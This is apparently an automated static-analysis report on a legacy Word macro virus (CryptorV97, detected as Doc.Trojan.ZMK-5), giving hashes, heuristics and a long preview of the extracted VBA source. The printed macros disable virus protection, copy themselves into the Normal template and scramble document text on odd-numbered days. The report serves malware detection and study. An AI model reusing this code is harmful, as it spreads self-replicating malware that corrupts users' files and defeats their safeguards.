Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1ca30d46409f5067…

MALICIOUS

Office (OLE)

Size: 63.0 KB
Created: 1998-05-01 15:12:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 08f9a0e42d4997b61a38cdffd6a1232d
SHA-1: 59ee4777ffa576a480c9cb8e0f90f0e3be062b10
SHA-256: 1ca30d46409f5067bafcc40fff95a8fcdc972f75eeb138af9ee64ddc262c1241
Risk score: 200

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing VBA macros, including AutoOpen and AutoClose functions, which are indicative of macro-based malware. The macros attempt to copy themselves to the Normal.dot template and obfuscate document content by replacing characters, suggesting an attempt to establish persistence and potentially hide malicious payloads. The presence of legacy WordBasic macro virus markers and ClamAV detection further supports its malicious nature.

Heuristics (5)

  • ClamAV: Doc.Trojan.ZMK-5 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.ZMK-5
  • Legacy WordBasic macro-virus markers (severity: high, rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS; 2 related findings)
    Document contains VBA macro code
  • AutoOpen macro (severity: high, rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro (severity: high, rule: OLE_VBA_AUTOCLOSE)
    Auto_Close macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 28216 bytes
SHA-256: 880342108389b10007f2a98cd1fd4bd15a9577dd138778edcf7c9ab249e9d15d

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "CryptorV97"
Sub AutoOpen()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorAO
iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
    If WordBasic.[MacroName$](i, 0) = "CryptorV97" Then
        CryptorV97Installed = -1
    End If
Next i
If Not CryptorV97Installed Then
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="CryptorV97", Object:=wdOrganizerObjectProjectItems
    MsgBox "Attention, modèle normal crypté ????", vbCritical, "Virus CryptorV97"
End If
ErrorAO:
End Sub
Sub AutoClose()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorAC
Dim MyDate
MyDate = Date
D$ = Mid(MyDate, 1, 2)
Select Case D$
    Case "01", "03", "05", "07", "09", "11", "13", "15", "17", "19", "21", "23", "25", "27", "29", "31"
Selection.WholeStory
StatusBar = "Cryptage du document en cours..., HAHAHAHAHA!!!!!"
For i = 1 To 500000
Next i
With Selection.Find
        .Text = "a"
        .Replacement.Text = "@"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "b"
        .Replacement.Text = Chr$(1)
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "c"
        .Replacement.Text = Chr$(8)
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "d"
        .Replacement.Text = "("
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "e"
        .Replacement.Text = "+"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "f"
        .Replacement.Text = "$"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "g"
        .Replacement.Text = "="
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "h"
        .Replacement.Text = "-"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "i"
        .Replacement.Text = "}"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "j"
        .Replacement.Text = "ç"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "k"
        .Replacement.Text = "#"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "l"
        .Replacement.Text = "\"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "m"
        .Replacement.Text = "/"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "n"
        .Replacement.Text = "~"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "o"
        .Replacement.Text = "^"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "p"
        .Replacement.Text = "]"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "q"
        .Replacement.Text = "°"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "r"
        .Replacement.Text = "²"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "s"
        .Replacement.Text = "&"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
        .Text = "t"
        .Replacement.Text = "|"
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
   
... (truncated)